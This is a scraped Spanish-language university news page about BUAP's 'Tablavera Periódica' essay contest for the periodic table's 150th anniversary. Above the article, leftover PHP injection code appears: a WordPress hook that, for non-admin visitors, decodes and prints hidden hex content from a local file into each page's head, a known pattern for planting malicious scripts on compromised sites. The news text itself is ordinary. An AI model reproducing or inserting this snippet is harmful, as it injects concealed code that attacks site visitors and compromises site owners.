if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Convoca BUAP al concurso «Tablavera Periódica» – La Opinión Universitaria La Opinión Universitaria
Menu

Convoca BUAP al concurso «Tablavera Periódica»

  • En este 2019, se conmemora el 150 años de la creación de la tabla periódicaPor Diego Cuautle

    Para conmemorar el Año Internacional de la Tabla Periódica, la Facultad de Ciencias Químicas de la Benemérita Universidad Autónoma de Puebla organiza el concurso “Tablavera Periódica” invitando a estudiantes de nivel medio superior y superior a escribir un ensayo sobre alguno de los elementos de la tabla periódica.

    Al presentar dicha actividad en relación a los 150 años de la creación de la tabla periódica, se dio a conocer que dicha convocatoria cierra el próximo 3 de julio esperando la inscripción de más 500 ensayos de los cuales serán premiados 150 de ellos, hasta el momento ya hay 300.

    Los ganadores construirán una pieza de Talavera que represente al elemento químico sobre el que escribieron, una vez que la Tabla se encuentre terminada, las piezas serán colocadas en el vestíbulo de la Facultad en Ciudad Universitaria, además se publicará una memoria gráfica.

    Al respecto, German Gutiérrez Camacho, director del Consejo Regulador de la Talavera, comentó que se buscará que el mural o vestíbulo sea reconocido como Patrimonio Cultural de la Humanidad.

    Cabe señalar que con esta celebración, la asamblea de la ONU pretende que se reconozca la importancia de la química para el desarrollo sostenible, resaltar la importancia que tiene el empleo de la tabla periódica en los proceso de investigación en las áreas de química, física y biología, destacar la continuidad de los descubrimientos científicos y promocionar la enseñanza de las ciencias particularmente en países en desarrollo.

    Además de reconocer la trascendencia que ha tenido en la historia y desarrollo de la ciencia el trabajo de Dimitri Mendeleiev lo cual le ha permitido a lo largo de la historia predecir tanto la apariencia como las propiedades de elementos que se fueron descubriendo al paso de los años.

    La convocatoria completa puede ser consultada en las redes sociales de la unidad académica, de la American Chimical Society y la Secretaria de Competitividad, Trabajo y Desarrollo Económico (SECOTRADE) quienes son también parte del comité organizador.

No comments

Deja una respuesta

Tweets recientes